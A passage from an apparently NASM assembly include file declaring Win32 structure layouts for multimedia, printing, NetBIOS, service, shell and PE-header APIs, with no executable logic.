.dwData2 RESD 1
.cc RESD 1
.cbData RESD 1
.xData8 RESD 1
ENDSTRUC
STRUC MONHSZSTRUCT
.cb RESD 1
.fsAction RESD 1
.dwTime RESD 1
.hsz RESD 1
.htask RESD 1
.xstr RESB 1
ENDSTRUC
STRUC MONERRSTRUCT
.cb RESD 1
.wLastError RESD 1
.dwTime RESD 1
.htask RESD 1
ENDSTRUC
STRUC MONLINKSTRUCT
.cb RESD 1
.dwTime RESD 1
.htask RESD 1
.fEstablished RESD 1
.fNoData RESD 1
.hszSvc RESD 1
.hszTopic RESD 1
.hszItem RESD 1
.wFmt RESD 1
.fServer RESD 1
.hConvServer RESD 1
.hConvClient RESD 1
ENDSTRUC
STRUC MONCONVSTRUCT
.cb RESD 1
.fConnect RESD 1
.dwTime RESD 1
.htask RESD 1
.hszSvc RESD 1
.hszTopic RESD 1
.hConvClient RESD 1
.hConvServer RESD 1
ENDSTRUC
STRUC smpte
.hour RESB 1
.minute RESB 1
.sec RESB 1
.frame RESB 1
.fps RESB 1
.dummy RESB 1
.pad RESB 1
ENDSTRUC
STRUC midi
.songptrpos RESD 1
ENDSTRUC
STRUC MMTIME
.wType RESD 1
.u RESD 1
ENDSTRUC
STRUC MIDIEVENT
.dwDeltaTime RESD 1
.dwStreamID RESD 1
.dwEvent RESD 1
.dwParms RESD 1
ENDSTRUC
STRUC MIDISTRMBUFFVER
.dwVersion RESD 1
.dwMid RESD 1
.dwOEMVersion RESD 1
ENDSTRUC
STRUC MIDIPROPTIMEDIV
.cbStruct RESD 1
.dwTimeDiv RESD 1
ENDSTRUC
STRUC MIDIPROPTEMPO
.cbStruct RESD 1
.dwTempo RESD 1
ENDSTRUC
STRUC MIXERCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.fdwSupport RESD 1
.cDestinations RESD 1
ENDSTRUC
STRUC Target
.dwType RESD 1
.dwDeviceID RESD 1
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
ENDSTRUC
STRUC MIXERLINECONTROLS
.cbStruct RESD 1
.dwLineID RESD 1
.dwControl RESD 1
.cControls RESD 1
.cbmxctrl RESD 1
.pamxctrl RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS
.cbStruct RESD 1
.dwControlID RESD 1
.cChannels RESD 1
.item RESD 1
.cbDetails RESD 1
.paDetails RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS_BOOLEAN
.fValue RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS_SIGNED
.lValue RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS_UNSIGNED
.dwValue RESD 1
ENDSTRUC
STRUC JOYINFOEX
.dwSize RESD 1
.dwFlags RESD 1
.dwXpos RESD 1
.dwYpos RESD 1
.dwZpos RESD 1
.dwRpos RESD 1
.dwUpos RESD 1
.dwVpos RESD 1
.dwButtons RESD 1
.dwButtonNumber RESD 1
.dwPOV RESD 1
.dwReserved1 RESD 1
.dwReserved2 RESD 1
ENDSTRUC
STRUC DRVCONFIGINFO
.dwDCISize RESD 1
.lpszDCISectionName RESD 1
.lpszDCIAliasName RESD 1
.dnDevNode RESD 1
ENDSTRUC
STRUC WAVEHDR
.lpData RESD 1
.dwBufferiLength RESD 1
.dwBytesRecorded RESD 1
.dwUser RESD 1
.dwFlags RESD 1
.dwLoops RESD 1
.lpNext RESD 1
.Reserved RESD 1
ENDSTRUC
STRUC WAVEOUTCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.dwFormats RESD 1
.wChannels RESW 1
.dwSupport RESD 1
ENDSTRUC
STRUC WAVEINCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.dwFormats RESD 1
.wChannels RESW 1
ENDSTRUC
STRUC WAVEFORMAT
.wFormatTag RESW 1
.nChannels RESW 1
.nSamplesPerSec RESD 1
.nAvgBytesPerSec RESD 1
.nBlockAlign RESW 1
ENDSTRUC
STRUC PCMWAVEFORMAT
.wf RESD 1
.wBitsPerSample RESW 1
ENDSTRUC
STRUC MIDIOUTCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.wTechnology RESW 1
.wVoices RESW 1
.wNotes RESW 1
.wChannelMask RESW 1
.dwSupport RESD 1
ENDSTRUC
STRUC MIDIINCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
ENDSTRUC
STRUC MIDIHDR
.lpData RESD 1
.dwBufferiLength RESD 1
.dwBytesRecorded RESD 1
.dwUser RESD 1
.dwFlags RESD 1
.lpNext RESD 1
.Reserved RESD 1
ENDSTRUC
STRUC AUXCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.wTechnology RESW 1
.dwSupport RESD 1
ENDSTRUC
STRUC TIMECAPS
.wPeriodMin RESD 1
.wPeriodMax RESD 1
ENDSTRUC
STRUC JOYCAPS
.wMid RESW 1
.wPid RESW 1
.szPname RESB MAXPNAMELEN
.wXmin RESW 1
.wXmax RESW 1
.wYmin RESW 1
.wYmax RESW 1
.wZmin RESW 1
.wZmax RESW 1
.wNumButtons RESW 1
.wPeriodMin RESW 1
.wPeriodMax RESW 1
ENDSTRUC
STRUC JOYINFO
.wXpos RESW 1
.wYpos RESW 1
.wZpos RESW 1
.wButtons RESW 1
ENDSTRUC
STRUC MMIOINFO
.dwFlags RESD 1
.fccIOProc RESD 1
.pIOProc RESD 1
.wErrorRet RESD 1
.htask RESD 1
.cchBuffer RESD 1
.pchBuffer RESD 1
.pchNext RESD 1
.pchEndRead RESD 1
.pchEndWrite RESD 1
.lBufOffset RESD 1
.lDiskOffset RESD 1
.adwInfo4 RESD 1
.dwReserved1 RESD 1
.dwReserved2 RESD 1
.hmmio RESD 1
ENDSTRUC
STRUC MMCKINFO
.ckid RESD 1
.ckSize RESD 1
.fccType RESD 1
.dwDataOffset RESD 1
.dwFlags RESD 1
ENDSTRUC
STRUC MCI_GENERIC_PARMS
.dwCallback RESD 1
ENDSTRUC
STRUC MCI_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
ENDSTRUC
STRUC MCI_PLAY_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_SEEK_PARMS
.dwCallback RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_STATUS_PARMS
.dwCallback RESD 1
.dwReturn RESD 1
.dwItem RESD 1
.dwTrack RESW 1
ENDSTRUC
STRUC MCI_INFO_PARMS
.dwCallback RESD 1
.lpstrReturn RESD 1
.dwRetSize RESD 1
ENDSTRUC
STRUC MCI_GETDEVCAPS_PARMS
.dwCallback RESD 1
.dwReturn RESD 1
.dwItem RESD 1
ENDSTRUC
STRUC MCI_SYSINFO_PARMS
.dwCallback RESD 1
.lpstrReturn RESD 1
.dwRetSize RESD 1
.dwNumber RESD 1
.wDeviceType RESD 1
ENDSTRUC
STRUC MCI_SET_PARMS
.dwCallback RESD 1
.dwTimeFormat RESD 1
.dwAudio RESD 1
ENDSTRUC
STRUC MCI_BREAK_PARMS
.dwCallback RESD 1
.nVirtKey RESD 1
.hwndBreak RESD 1
ENDSTRUC
STRUC MCI_SOUND_PARMS
.dwCallback RESD 1
.lpstrSoundName RESD 1
ENDSTRUC
STRUC MCI_SAVE_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
ENDSTRUC
STRUC MCI_LOAD_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
ENDSTRUC
STRUC MCI_RECORD_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_VD_PLAY_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
.dwSpeed RESD 1
ENDSTRUC
STRUC MCI_VD_STEP_PARMS
.dwCallback RESD 1
.dwFrames RESD 1
ENDSTRUC
STRUC MCI_VD_ESCAPE_PARMS
.dwCallback RESD 1
.lpstrCommand RESD 1
ENDSTRUC
STRUC MCI_WAVE_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
.dwBufferSeconds RESD 1
ENDSTRUC
STRUC MCI_WAVE_DELETE_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_WAVE_SET_PARMS
.dwCallback RESD 1
.dwTimeFormat RESD 1
.dwAudio RESD 1
.wInput RESD 1
.wOutput RESD 1
.wFormatTag RESW 1
.wReserved2 RESW 1
.nChannels RESW 1
.wReserved3 RESW 1
.nSamplesPerSec RESD 1
.nAvgBytesPerSec RESD 1
.nBlockAlign RESW 1
.wReserved4 RESW 1
.wBitsPerSample RESW 1
.wReserved5 RESW 1
ENDSTRUC
STRUC MCI_SEQ_SET_PARMS
.dwCallback RESD 1
.dwTimeFormat RESD 1
.dwAudio RESD 1
.dwTempo RESD 1
.dwPort RESD 1
.dwSlave RESD 1
.dwMaster RESD 1
.dwOffset RESD 1
ENDSTRUC
STRUC MCI_ANIM_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
.dwStyle RESD 1
.hWndParent RESD 1
ENDSTRUC
STRUC MCI_ANIM_PLAY_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
.dwSpeed RESD 1
ENDSTRUC
STRUC MCI_ANIM_STEP_PARMS
.dwCallback RESD 1
.dwFrames RESD 1
ENDSTRUC
STRUC MCI_ANIM_WINDOW_PARMS
.dwCallback RESD 1
.hwnd RESD 1
.nCmdShow RESD 1
.lpstrText RESD 1
ENDSTRUC
STRUC MCI_ANIM_RECT_PARMS
.dwCallback RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC MCI_ANIM_UPDATE_PARMS
.dwCallback RESD 1
.rc RESB RECT_size
.hDC RESD 1
ENDSTRUC
STRUC MCI_OVLY_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
.dwStyle RESD 1
.hWndParent RESD 1
ENDSTRUC
STRUC MCI_OVLY_WINDOW_PARMS
.dwCallback RESD 1
.hwnd RESD 1
.nCmdShow RESD 1
.lpstrText RESD 1
ENDSTRUC
STRUC MCI_OVLY_RECT_PARMS
.dwCallback RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC MCI_OVLY_SAVE_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC MCI_OVLY_LOAD_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC PRINTER_INFO_1
.flags RESD 1
.pDescription RESD 1
.pName RESD 1
.pComment RESD 1
ENDSTRUC
STRUC PRINTER_INFO_2
.pServerName RESD 1
.pPrinterName RESD 1
.pShareName RESD 1
.pPortName RESD 1
.pDriverName RESD 1
.pComment RESD 1
.pLocation RESD 1
.pDevMode RESD 1
.pSepFile RESD 1
.pPrintProcessor RESD 1
.pDatatype RESD 1
.pParameters RESD 1
.pSecurityDescriptor RESD 1
.Attributes RESD 1
.Priority RESD 1
.DefaultPriority RESD 1
.StartTime RESD 1
.UntilTime RESD 1
.Status RESD 1
.cJobs RESD 1
.AveragePPM RESD 1
ENDSTRUC
STRUC PRINTER_INFO_3
.pSecurityDescriptor RESD 1
ENDSTRUC
STRUC JOB_INFO_1
.JobId RESD 1
.pPrinterName RESD 1
.pMachineName RESD 1
.pUserName RESD 1
.pDocument RESD 1
.pDatatype RESD 1
.pStatus RESD 1
.Status RESD 1
.Priority RESD 1
.Position RESD 1
.TotalPages RESD 1
.PagesPrinted RESD 1
.Submitted RESD 1
ENDSTRUC
STRUC JOB_INFO_2
.JobId RESD 1
.pPrinterName RESD 1
.pMachineName RESD 1
.pUserName RESD 1
.pDocument RESD 1
.pNotifyName RESD 1
.pDatatype RESD 1
.pPrintProcessor RESD 1
.pParameters RESD 1
.pDriverName RESD 1
.pDevMode RESD 1
.pStatus RESD 1
.pSecurityDescriptor RESD 1
.Status RESD 1
.Priority RESD 1
.Position RESD 1
.StartTime RESD 1
.UntilTime RESD 1
.TotalPages RESD 1
.isize RESD 1
.Submitted RESD 1
.time RESD 1
.PagesPrinted RESD 1
ENDSTRUC
STRUC ADDJOB_INFO_1
.Path RESD 1
.JobId RESD 1
ENDSTRUC
STRUC DRIVER_INFO_1
.pName RESD 1
ENDSTRUC
STRUC DRIVER_INFO_2
.cVersion RESD 1
.pName RESD 1
.pEnvironment RESD 1
.pDriverPath RESD 1
.pDataFile RESD 1
.pConfigFile RESD 1
ENDSTRUC
STRUC DOC_INFO_1
.pDocName RESD 1
.pOutputFile RESD 1
.pDatatype RESD 1
ENDSTRUC
STRUC FORM_INFO_1
.pName RESD 1
.isize RESD 1
.ImageableArea RESD 1
ENDSTRUC
STRUC PRINTPROCESSOR_INFO_1
.pName RESD 1
ENDSTRUC
STRUC PORT_INFO_1
.pName RESD 1
ENDSTRUC
STRUC MONITOR_INFO_1
.pName RESD 1
ENDSTRUC
STRUC MONITOR_INFO_2
.pName RESD 1
.pEnvironment RESD 1
.pDLLName RESD 1
ENDSTRUC
STRUC DATATYPES_INFO_1
.pName RESD 1
ENDSTRUC
STRUC PRINTER_DEFAULTS
.pDatatype RESD 1
.pDevMode RESD 1
.DesiredAccess RESD 1
ENDSTRUC
STRUC PRINTER_INFO_4
.pPrinterName RESD 1
.pServerName RESD 1
.Attributes RESD 1
ENDSTRUC
STRUC PRINTER_INFO_5
.pPrinterName RESD 1
.pPortName RESD 1
.Attributes RESD 1
.DeviceNotSelectedTimeout RESD 1
.TransmissionRetryTimeout RESD 1
ENDSTRUC
STRUC DRIVER_INFO_3
.cVersion RESD 1
.pName RESD 1
.pEnvironment RESD 1
.pDriverPath RESD 1
.pDataFile RESD 1
.pConfigFile RESD 1
.pHelpFile RESD 1
.pDependentFiles RESD 1
.pMonitorName RESD 1
.pDefaultDataType RESD 1
ENDSTRUC
STRUC DOC_INFO_2
.pDocName RESD 1
.pOutputFile RESD 1
.pDatatype RESD 1
.dwMode RESD 1
.JobId RESD 1
ENDSTRUC
STRUC PORT_INFO_2
.pPortName RESD 1
.pMonitorName RESD 1
.pDescription RESD 1
.fPortType RESD 1
.Reserved RESD 1
ENDSTRUC
STRUC PROVIDOR_INFO_1
.pName RESD 1
.pEnvironment RESD 1
.pDLLName RESD 1
ENDSTRUC
STRUC NETRESOURCE
.dwScope RESD 1
.dwType RESD 1
.dwDisplayType RESD 1
.dwUsage RESD 1
.lpLocalName RESD 1
.lpRemoteName RESD 1
.lpComment RESD 1
.lpProvider RESD 1
ENDSTRUC
STRUC NCB
.ncb_command RESW 1
.ncb_retcode RESW 1
.ncb_lsn RESW 1
.ncb_num RESW 1
.ncb_buffer RESD 1
.ncb_length RESW 1
.ncb_callname RESB NCBNAMSZ
.ncb_name RESB NCBNAMSZ
.ncb_rto RESW 1
.ncb_sto RESW 1
.ncb_post RESD 1
.ncb_lana_num RESW 1
.ncb_cmd_cplt RESW 1
.ncb_reserve10 RESB 1
.ncb_event RESD 1
ENDSTRUC
STRUC ADAPTER_STATUS
.adapter_address RESB 6
.rev_major RESW 1
.reserved0 RESW 1
.adapter_type RESW 1
.rev_minor RESW 1
.duration RESW 1
.frmr_recv RESW 1
.frmr_xmit RESW 1
.iframe_recv_err RESW 1
.xmit_aborts RESW 1
.xmit_success RESD 1
.recv_success RESD 1
.iframe_xmit_err RESW 1
.recv_buff_unavail RESW 1
.t1_timeouts RESW 1
.ti_timeouts RESW 1
.Reserved1 RESD 1
.free_ncbs RESW 1
.max_cfg_ncbs RESW 1
.max_ncbs RESW 1
.xmit_buf_unavail RESW 1
.max_dgram_isize RESW 1
.pending_sess RESW 1
.max_cfg_sess RESW 1
.max_sess RESW 1
.max_sess_pkt_isize RESW 1
.name_count RESW 1
ENDSTRUC
STRUC NAME_BUFFER
.xname RESB NCBNAMSZ
.name_num RESW 1
.name_flags RESW 1
ENDSTRUC
STRUC SESSION_HEADER
.sess_name RESW 1
.num_sess RESW 1
.rcv_dg_outstanding RESW 1
.rcv_any_outstanding RESW 1
ENDSTRUC
STRUC SESSION_BUFFER
.lsn RESW 1
.State RESW 1
.local_name RESB NCBNAMSZ
.remote_name RESB NCBNAMSZ
.rcvs_outstanding RESW 1
.sends_outstanding RESW 1
ENDSTRUC
STRUC LANA_ENUM
.iLength RESW 1
.lana RESW 1
ENDSTRUC
STRUC FIND_NAME_HEADER
.node_count RESW 1
.Reserved RESW 1
.unique_group RESW 1
ENDSTRUC
STRUC FIND_NAME_BUFFER
.iLength RESW 1
.access_control RESW 1
.frame_control RESW 1
.destination_addr RESW 1
.source_addr RESW 1
.routing_info RESW 1
ENDSTRUC
STRUC ACTION_HEADER
.transport_id RESD 1
.action_code RESW 1
.Reserved RESW 1
ENDSTRUC
STRUC CRGB
.bRed RESB 1
.bGreen RESB 1
.bBlue RESB 1
.bExtra RESB 1
ENDSTRUC
STRUC SERVICE_STATUS
.dwServiceType RESD 1
.dwCurrentState RESD 1
.dwControlsAccepted RESD 1
.dwWin32ExitCode RESD 1
.dwServiceSpecificExitCode RESD 1
.dwCheckPoint RESD 1
.dwWaitHint RESD 1
ENDSTRUC
STRUC ENUM_SERVICE_STATUS
.lpServiceName RESD 1
.lpDisplayName RESD 1
.ServiceStatus RESD 1
ENDSTRUC
STRUC QUERY_SERVICE_LOCK_STATUS
.fIsLocked RESD 1
.lpLockOwner RESD 1
.dwLockDuration RESD 1
ENDSTRUC
STRUC QUERY_SERVICE_CONFIG
.dwServiceType RESD 1
.dwStartType RESD 1
.dwErrorControl RESD 1
.lpBinaryPathName RESD 1
.lpLoadOrderGroup RESD 1
.dwTagId RESD 1
.lpDependencies RESD 1
.lpServiceStartName RESD 1
.lpDisplayName RESD 1
ENDSTRUC
STRUC SERVICE_TABLE_ENTRY
.lpServiceName RESD 1
.lpServiceProc RESD 1
ENDSTRUC
STRUC LARGE_INTEGER
.lowpart RESD 1
.highpart RESD 1
ENDSTRUC
STRUC PERF_DATA_BLOCK
.Signature RESB 4
.LittleEndian RESD 1
.Version RESD 1
.Revision RESD 1
.TotalByteiLength RESD 1
.HeaderiLength RESD 1
.NumObjectTypes RESD 1
.DefaultObject RESD 1
.SystemTime RESD 1
.PerfTime RESD 1
.PerfFreq RESD 1
.PerTime100nSec RESD 1
.SystemNameiLength RESD 1
.SystemNameOffset RESD 1
ENDSTRUC
STRUC PERF_OBJECT_TYPE
.TotalByteiLength RESD 1
.DefinitioniLength RESD 1
.HeaderiLength RESD 1
.ObjectNameTitleIndex RESD 1
.ObjectNameTitle RESD 1
.ObjectHelpTitleIndex RESD 1
.ObjectHelpTitle RESD 1
.DetailLevel RESD 1
.NumCounters RESD 1
.DefaultCounter RESD 1
.NumInstances RESD 1
.CodePage RESD 1
.PerfTime RESD 1
.PerfFreq RESD 1
ENDSTRUC
STRUC PERF_COUNTER_DEFINITION
.ByteiLength RESD 1
.CounterNameTitleIndex RESD 1
.CounterNameTitle RESD 1
.CounterHelpTitleIndex RESD 1
.CounterHelpTitle RESD 1
.DefaultScale RESD 1
.DetailLevel RESD 1
.CounterType RESD 1
.CounterSize RESD 1
.CounterOffset RESD 1
ENDSTRUC
STRUC PERF_INSTANCE_DEFINITION
.ByteiLength RESD 1
.ParentObjectTitleIndex RESD 1
.ParentObjectInstance RESD 1
.UniqueID RESD 1
.NameOffset RESD 1
.NameiLength RESD 1
ENDSTRUC
STRUC PERF_COUNTER_BLOCK
.ByteiLength RESD 1
ENDSTRUC
STRUC COMPOSITIONFORM
.dwStyle RESD 1
.ptCurrentPos RESB POINT_size
.rcArea RESB RECT_size
ENDSTRUC
STRUC CANDIDATEFORM
.dwIndex RESD 1
.dwStyle RESD 1
.ptCurrentPos RESB POINT_size
.rcArea RESB RECT_size
ENDSTRUC
STRUC CANDIDATELIST
.dwSize RESD 1
.dwStyle RESD 1
.dwCount RESD 1
.dwSelection RESD 1
.dwPageStart RESD 1
.dwPageSize RESD 1
.dwOffset1 RESD 1
ENDSTRUC
STRUC STYLEBUF
.dwStyle RESD 1
.szDescription RESB STYLE_DESCRIPTION_SIZE
ENDSTRUC
STRUC MODEMDEVCAPS
.dwActualSize RESD 1
.dwRequiredSize RESD 1
.dwDevSpecificOffset RESD 1
.dwDevSpecificSize RESD 1
.dwModemProviderVersion RESD 1
.dwModemManufacturerOffset RESD 1
.dwModemManufacturerSize RESD 1
.dwModemModelOffset RESD 1
.dwModemModelSize RESD 1
.dwModemVersionOffset RESD 1
.dwModemVersionSize RESD 1
.dwDialOptions RESD 1
.dwCallSetupFailTimer RESD 1
.dwInactivityTimeout RESD 1
.dwSpeakerVolume RESD 1
.dwSpeakerMode RESD 1
.dwModemOptions RESD 1
.dwMaxDTERate RESD 1
.dwMaxDCERate RESD 1
.abVariablePortion RESB 1
ENDSTRUC
STRUC MODEMSETTINGS
.dwActualSize RESD 1
.dwRequiredSize RESD 1
.dwDevSpecificOffset RESD 1
.dwDevSpecificSize RESD 1
.dwCallSetupFailTimer RESD 1
.dwInactivityTimeout RESD 1
.dwSpeakerVolume RESD 1
.dwSpeakerMode RESD 1
.dwPreferredModemOptions RESD 1
.dwNegotiatedModemOptions RESD 1
.dwNegotiatedDCERate RESD 1
.abVariablePortion RESB 1
ENDSTRUC
STRUC DRAGINFO
.uSize RESD 1
.pt RESB POINT_size
.fNC RESD 1
.lpFileList RESD 1
.grfKeyState RESD 1
ENDSTRUC
STRUC APPBARDATA
.cbSize RESD 1
.hwnd RESD 1
.uCallbackMessage RESD 1
.uEdge RESD 1
.rc RESB RECT_size
.lParam RESD 1
ENDSTRUC
STRUC SHFILEOPSTRUCT
.hwnd RESD 1
.wFunc RESD 1
.pFrom RESD 1
.pTo RESD 1
.fFlags RESW 1
.fAnyOperationsAborted RESD 1
.hNameMappings RESD 1
.lpszProgressTitle RESD 1
ENDSTRUC
STRUC SHNAMEMAPPING
.pszOldPath RESD 1
.pszNewPath RESD 1
.cchOldPath RESD 1
.cchNewPath RESD 1
ENDSTRUC
STRUC SHELLEXECUTEINFO
.cbSize RESD 1
.fMask RESD 1
.hwnd RESD 1
.lpVerb RESD 1
.lpFile RESD 1
.lpParameters RESD 1
.lpDirectory RESD 1
.nShow RESD 1
.hInstApp RESD 1
.lpIDList RESD 1
.lpClass RESD 1
.hkeyClass RESD 1
.dwHotKey RESD 1
.hIcon RESD 1
.hProcess RESD 1
ENDSTRUC
STRUC NOTIFYICONDATA
.cbSize RESD 1
.hwnd RESD 1
.uID RESD 1
.uFlags RESD 1
.uCallbackMessage RESD 1
.hIcon RESD 1
.szTip RESB 64
ENDSTRUC
STRUC SHFILEINFO
.hIcon RESD 1
.iIcon RESD 1
.dwAttributes RESD 1
.szDisplayName RESB MAX_PATH ; TCHAR szDisplayName[MAX_PATH], so szTypeName starts at the right offset
.szTypeName RESB 80
ENDSTRUC
STRUC VS_FIXEDFILEINFO
.dwSignature RESD 1
.dwStrucVersion RESD 1
.dwFileVersionMS RESD 1
.dwFileVersionLS RESD 1
.dwProductVersionMS RESD 1
.dwProductVersionLS RESD 1
.dwFileFlagsMask RESD 1
.dwFileFlags RESD 1
.dwFileOS RESD 1
.dwFileType RESD 1
.dwFileSubtype RESD 1
.dwFileDateMS RESD 1
.dwFileDateLS RESD 1
ENDSTRUC
STRUC ICONMETRICS
.cbSize RESD 1
.iHorzSpacing RESD 1
.iVertSpacing RESD 1
.iTitleWrap RESD 1
.lfFont RESD 1
ENDSTRUC
STRUC HELPINFO
.cbSize RESD 1
.iContextType RESD 1
.iCtrlId RESD 1
.hItemHandle RESD 1
.dwContextId RESD 1
.MousePos RESD 1
ENDSTRUC
STRUC ANIMATIONINFO
.cbSize RESD 1
.iMinAnimate RESD 1
ENDSTRUC
STRUC MINIMIZEDMETRICS
.cbSize RESD 1
.iWidth RESD 1
.iHorzGap RESD 1
.iVertGap RESD 1
.iArrange RESD 1
.lfFont RESD 1
ENDSTRUC
STRUC OSVERSIONINFO
.dwOSVersionInfoSize RESD 1
.dwMajorVersion RESD 1
.dwMinorVersion RESD 1
.dwBuildNumber RESD 1
.dwPlatformId RESD 1
.szCSDVersion RESB 128
ENDSTRUC
STRUC SYSTEM_POWER_STATUS
.ACLineStatus RESB 1
.BatteryFlag RESB 1
.BatteryLifePercent RESB 1
.Reserved1 RESB 1
.BatteryLifeTime RESD 1
.BatteryFullLifeTime RESD 1
ENDSTRUC
STRUC NMHDR
.hwndFrom RESD 1
.idfrom RESD 1
.code RESD 1
ENDSTRUC
STRUC DEVNAMES
.wDriverOffset RESW 1
.wDeviceOffset RESW 1
.wOutputOffset RESW 1
.wDefault RESW 1
ENDSTRUC
STRUC PAGESETUPDLGAPI
.lStructSize RESD 1
.hwndOwner RESD 1
.hDevMode RESD 1
.hDevNames RESD 1
.flags RESD 1
.ptPaperSize RESB POINT_size
.rtMinMargin RESD 1
.rtMargin RESD 1
.hInstance RESD 1
.lCustData RESD 1
.lpfnPageSetupHook RESD 1
.lpfnPagePaintHook RESD 1
.lpPageSetupTemplateName RESD 1
.hPageSetupTemplate RESD 1
ENDSTRUC
STRUC COMMCONFIG
.dwSize RESD 1
.wVersion RESW 1
.wReserved RESW 1
.dcbx RESD 1
.dwProviderSubType RESD 1
.dwProviderOffset RESD 1
.dwProviderSize RESD 1
.wcProviderData RESB 1
ENDSTRUC
STRUC PIXELFORMATDESCRIPTOR
.nSize RESW 1
.nVersion RESW 1
.dwFlags RESD 1
.iPixelType RESB 1
.cColorBits RESB 1
.cRedBits RESB 1
.cRedShift RESB 1
.cGreenBits RESB 1
.cGreenShift RESB 1
.cBlueBits RESB 1
.cBlueShift RESB 1
.cAlphaBits RESB 1
.cAlphaShift RESB 1
.cAccumBits RESB 1
.cAccumRedBits RESB 1
.cAccumGreenBits RESB 1
.cAccumBlueBits RESB 1
.cAccumAlphaBits RESB 1
.cDepthBits RESB 1
.cStencilBits RESB 1
.cAuxBuffers RESB 1
.iLayerType RESB 1
.bReserved RESB 1
.dwLayerMask RESD 1
.dwVisibleMask RESD 1
.dwDamageMask RESD 1
ENDSTRUC
STRUC DRAWTEXTPARAMS
.cbSize RESD 1
.iTabiLength RESD 1
.iLeftMargin RESD 1
.iRightMargin RESD 1
.uiiLengthDrawn RESD 1
ENDSTRUC
STRUC MENUITEMINFO
.cbSize RESD 1
.fMask RESD 1
.fType RESD 1
.fState RESD 1
.wID RESD 1
.hSubMenu RESD 1
.hbmpChecked RESD 1
.hbmpUnchecked RESD 1
.dwItemData RESD 1
.dwTypeData RESD 1
.cch RESD 1
ENDSTRUC
STRUC SCROLLINFO
.cbSize RESD 1
.fMask RESD 1
.nMin RESD 1
.nMax RESD 1
.nPage RESD 1
.nPos RESD 1
.nTrackPos RESD 1
ENDSTRUC
STRUC MSGBOXPARAMS
.cbSize RESD 1
.hwndOwner RESD 1
.hInstance RESD 1
.lpszText RESD 1
.lpszCaption RESD 1
.dwStyle RESD 1
.lpszIcon RESD 1
.dwContextHelpId RESD 1
.lpfnMsgBoxCallback RESD 1
.dwLanguageId RESD 1
ENDSTRUC
STRUC DEBUG_EVENT
.dwDebugEventCode RESD 1
.dwProcessId RESD 1
.dwThreadId RESD 1
.u RESD 1
ENDSTRUC
STRUC COLORMAP
.cmFrom RESD 1
.cmTo RESD 1
ENDSTRUC
STRUC AuxVol
.vLow RESW 1
.vHigh RESW 1
ENDSTRUC
STRUC DBGTHREAD
.hThread RESD 1
.lpStartAddress RESD 1
.bfState RESD 1
.nNext RESQ 1
ENDSTRUC
STRUC DbgProcess
.hDbgHeap RESD 1
.dwProcessID RESD 1
.dwThreadID RESD 1
.hProcess RESD 1
.hFile RESD 1
.lpImage RESD 1
ENDSTRUC
STRUC IMAGE_DATA_DIRECTORY
.VirtualAddress RESD 1
.isize RESD 1
ENDSTRUC
STRUC IMAGE_OPTIONAL_HEADER
.Magic RESW 1
.MajorLinkerVersion RESB 1
.MinorLinkerVersion RESB 1
.SizeOfCode RESD 1
.SizeOfInitializedData RESD 1
.SizeOfUninitializedData RESD 1
.AddressOfEntryPoint RESD 1
.BaseOfCode RESD 1
.BaseOfData RESD 1
.ImageBase RESD 1
.SectionAlignment RESD 1
.FileAlignment RESD 1
.MajorOperatingSystemVersion RESW 1
.MinorOperatingSystemVersion RESW 1
.MajorImageVersion RESW 1
.MinorImageVersion RESW 1
.MajorSubsystemVersion RESW 1
.MinorSubsystemVersion RESW 1
.Reserved1 RESD 1
.SizeOfImage RESD 1
.SizeOfHeaders RESD 1
.CheckSum RESD 1
.Subsystem RESW 1
.DllCharacteristics RESW 1
.SizeOfStackReserve RESD 1
.SizeOfStackCommit RESD 1
.SizeOfHeapReserve RESD 1
.SizeOfHeapCommit RESD 1
.LoaderFlags RESD 1
.NumberOfRvaAndSizes RESD 1
.DataDirectory RESB IMAGE_DATA_DIRECTORY_size*16 ; 16 IMAGE_DATA_DIRECTORY entries (IMAGE_NUMBEROF_DIRECTORY_ENTRIES), total header size 0E0h
ENDSTRUC
STRUC IMAGE_FILE_HEADER
.Machine RESW 1
.NumberOfSections RESW 1
.TimeDateStamp RESD 1
.PointerToSymbolTable RESD 1
.NumberOfSymbols RESD 1
